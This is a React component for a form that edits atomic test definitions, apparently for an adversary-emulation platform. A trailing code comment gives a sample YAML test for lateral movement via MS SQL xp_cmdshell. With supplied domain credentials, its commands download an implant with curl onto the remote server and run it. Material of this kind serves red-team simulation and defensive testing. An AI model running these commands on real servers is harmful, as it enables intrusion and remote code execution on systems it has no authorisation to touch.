import EngineOptions from './EngineOptions';
import InputParameters from './InputParameters';
import OutputParameters from './OutputParameters';
import { osPlatformTypes, executableByType, executorTypes } from './enums';

export default function Editor({ttpData, setTtpData, setError}) {
    return (
        <div className="p-10 w-full min-h-screen bg-gray-100">
            <div className="flex mb-4">
                <label className="w-1/3 block text-gray-700 text-sm font-bold mb-2" htmlFor="atomic_test">Atomic Test ID</label>
                <input className={"w-2/3 shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline" +
                    (ttpData.atomic_test && /^[0-9]+$/.test(ttpData.atomic_test) ? "" : " border-red-500")
                }
                    id="atomic_test" type="text" placeholder="Atomic Test ID"
                    value={ttpData.atomic_test || ""}
                    onChange={(e) => setTtpData({...ttpData, atomic_test: e.target.value})} />
            </div>
            <div className="flex mb-4">
                <label className="w-1/3 block text-gray-700 text-sm font-bold mb-2" htmlFor="name">Atomic Test Name</label>
                <input className={"w-2/3 shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline" +
                    (ttpData.name ? "" : " border-red-500") }
                    id="name" type="text" placeholder="Atomic Test Name"
                    value={ttpData.name || ""}
                    onChange={(e) => setTtpData({...ttpData, name: e.target.value})} />
            </div>
            <div className="flex mb-4">
                <label className="w-1/3 block text-gray-700 text-sm font-bold mb-2" htmlFor="description">Description</label>
                <textarea className={"w-2/3 shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline" +
                    (ttpData.description ? "" : " border-red-500") }
                    id="description" placeholder="Description"
                    value={ttpData.description || ""}
                    onChange={(e) => setTtpData({...ttpData, description: e.target.value})} />
            </div>
            <div className="flex mb-4">
                <label className="w-1/3 block text-gray-700 text-sm font-bold mb-2" htmlFor="severity_score">Severity Score</label>
                <input className={"w-2/3 shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline" +
                    (ttpData.severity_score && /^[0-9]+$/.test(ttpData.severity_score) ? "" : " border-red-500") }
                    id="severity_score" type="number" placeholder="Severity Score"
                    value={ttpData.severity_score || ""}
                    onChange={(e) => setTtpData({...ttpData, severity_score: parseInt(e.target.value)})} />
            </div>
            <div className="flex mb-4">
                <label className="w-1/3 block text-gray-700 text-sm font-bold mb-2" htmlFor="supported_platform">Supported Platform</label>
                <select className={"w-2/3 shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline bg-white" +
                    (ttpData.supported_platform ? "" : " border-red-500") }
                    id="supported_platform" placeholder="Supported Platform"
                    value={ttpData.supported_platform || ""}
                    onChange={(e) => setTtpData({...ttpData, supported_platform: e.target.value})}>
                    <option value="">Select a platform</option>
                    {
                        osPlatformTypes.map((platform, index) => {
                            return <option key={index} value={platform}>{platform}</option>
                        })
                    }
                </select>
            </div>
            <div className="flex mb-4">
                <label className="w-1/3 block text-gray-700 text-sm font-bold mb-2" htmlFor="executable_by">Executable By</label>
                <select className={"w-2/3 shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline bg-white" +
                    (ttpData.executable_by ? "" : " border-red-500") }
                    id="executable_by" placeholder="Executable By"
                    value={ttpData.executable_by || ""}
                    onChange={(e) => setTtpData({...ttpData, executable_by: e.target.value})}>
                    <option value="">Select a user</option>
                    {
                        executableByType.map((user, index) => {
                            return <option key={index} value={user}>{user}</option>
                        })
                    }
                </select>
            </div>

            <div className="border-t border-gray-400 my-4"></div>

            <div className="w-full">
                <h1 className="block text-gray-700 text-sm mb-4 font-bold mb-2">Executor</h1>
                <div className="flex flex-col">
                    <div className="flex mb-4">
                        <label className="w-1/3 block text-gray-700 text-sm font-bold mb-2" htmlFor="executor.name">Name</label>
                        <select className={"w-2/3 shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline bg-white" +
                            (ttpData.executor && ttpData.executor.name ? "" : " border-red-500") }
                            id="executor.name" placeholder="Name"
                            value={ttpData.executor && ttpData.executor.name || ""}
                            onChange={(e) => setTtpData({...ttpData, executor: {...ttpData.executor, name: e.target.value}})}>
                            <option value="">Select an executor</option>
                            {
                                executorTypes.map((executor, index) => {
                                    return <option key={index} value={executor}>{executor}</option>
                                })
                            }
                        </select>
                    </div>
                    <div className="flex mb-4">
                        <label className="w-1/3 block text-gray-700 text-sm font-bold mb-2" htmlFor="executor.elevation_required">Elevation Required</label>
                        <select className="w-2/3 shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline bg-white"
                            id="executor.elevation_required" placeholder="Elevation Required"
                            value={ttpData.executor !== undefined ? ttpData.executor.elevation_required : ""}
                            onChange={(e) => setTtpData({...ttpData, executor: {...ttpData.executor, elevation_required: e.target.value === "true"}})}>
                            <option value="">Select an elevation requirement</option>
                            <option value="true">Yes</option>
                            <option value="false">No</option>
                        </select>
                    </div>
                    <div className="flex mb-4">
                        <label className="w-1/3 block text-gray-700 text-sm font-bold mb-2" htmlFor="executor.command">Command</label>
                        <textarea className={"w-2/3 shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline" +
                            (ttpData.executor && ttpData.executor.command ? "" : " border-red-500") }
                            id="executor.command" placeholder="Command"
                            value={ttpData.executor && ttpData.executor.command || ""}
                            onChange={(e) => setTtpData({...ttpData, executor: {...ttpData.executor, command: e.target.value}})} />
                    </div>
                    <div className="flex mb-4">
                        <label className="w-1/3 block text-gray-700 text-sm font-bold mb-2" htmlFor="executor.parser_command">Parser Command</label>
                        <textarea className="w-2/3 shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline"
                            id="executor.parser_command" placeholder="Parser Command"
                            value={ttpData.executor && ttpData.executor.parser_command || ""}
                            onChange={(e) => setTtpData({...ttpData, executor: {...ttpData.executor, parser_command: e.target.value}})} />
                    </div>
                    <div className="flex mb-4">
                        <label className="w-1/3 block text-gray-700 text-sm font-bold mb-2" htmlFor="executor.cleanup_command">Cleanup Command</label>
                        <textarea className="w-2/3 shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline"
                            id="executor.cleanup_command" placeholder="Cleanup Command"
                            value={ttpData.executor && ttpData.executor.cleanup_command || ""}
                            onChange={(e) => setTtpData({...ttpData, executor: {...ttpData.executor, cleanup_command: e.target.value}})} />
                    </div>
                </div>
            </div>

            <div className="border-t border-gray-400 my-4"></div>

            <InputParameters ttpData={ttpData} setTtpData={setTtpData} setError={setError} />

            <div className="border-t border-gray-400 my-4"></div>

            <OutputParameters ttpData={ttpData} setTtpData={setTtpData} setError={setError} />

            <div className="border-t border-gray-400 my-4"></div>
            
            <EngineOptions ttpData={ttpData} setTtpData={setTtpData} setError={setError} />
        </div>
    )
}


// atomic_tests:
//   - atomic_test: "1"
//     name: Perform lateral movement using MS SQL xp_cmdshell
//     description: Connect to a Microsoft SQL server database and use the xp_cmdshell stored procedure to execute arbitrary commands.
//     severity_score: 7
//     supported_platform: windows
//     executable_by: all
//     engine_options:
//       scope:
//         level: campaign
//         unique_fields: [ad_domain, username, server]
//       preconditions:
//         - type: has_open_port
//           value:
//             port: 1433
//             host: "#{server}"
//             protocol: tcp
//     executor:
//       name: powershell
//       elevation_required: false
//       command: |
//         & "#{xp_cmdshell}" -s #{server} -u #{ad_domain}\#{username} -p #{password} -c "curl.exe #{implant:url} -o %USERPROFILE%\AppData\Local\Temp\!{task_id}-#{implant_guid}.exe"
//         & "#{xp_cmdshell}" -daemon -s #{server} -u #{ad_domain}\#{username} -p #{password} -c "%USERPROFILE%\AppData\Local\Temp\!{task_id}-#{implant_guid}.exe"
//         exit $LASTEXITCODE
//       cleanup_command: |
//         & "#{xp_cmdshell}" -s #{server} -u #{ad_domain}\#{username} -p #{password} -c "del %USERPROFILE%\AppData\Local\Temp\!{task_id}-#{implant_guid}.exe"
//     requirements:
//       - name: xp_cmdshell
//         type: executable
//         args:
//           identifier: resources/xp_cmdshell
//           platform: windows
//           architecture: amd64
//       - name: implant
//         type: implant
//         args:
//           platform: windows
//           architecture: amd64
//           guid: "#{implant_guid}"
//     input_parameters:
//       - name: server
//         display_name: Server
//         description: Server
//         type: host
//         required: true
//         autofill_on_engine: true
//         autofill_on_dashboard: false
//       - name: username
//         display_name: Username
//         description: Username
//         type: username
//         required: true
//         autofill_on_engine: true
//         autofill_on_dashboard: false
//       - name: ad_domain
//         display_name: AD Domain
//         description: AD Domain
//         type: ad_domain
//         required: true
//         autofill_on_engine: true
//         autofill_on_dashboard: false
//       - name: password
//         display_name: Password
//         description: Password
//         type: plain
//         required: true
//         autofill_on_engine: true
//         autofill_on_dashboard: false
//       - name: implant_guid
//         display_name: Implant GUID
//         description: Implant GUID
//         type: string
//         required: true
//         autofill_on_engine: false
//         autofill_on_dashboard: true
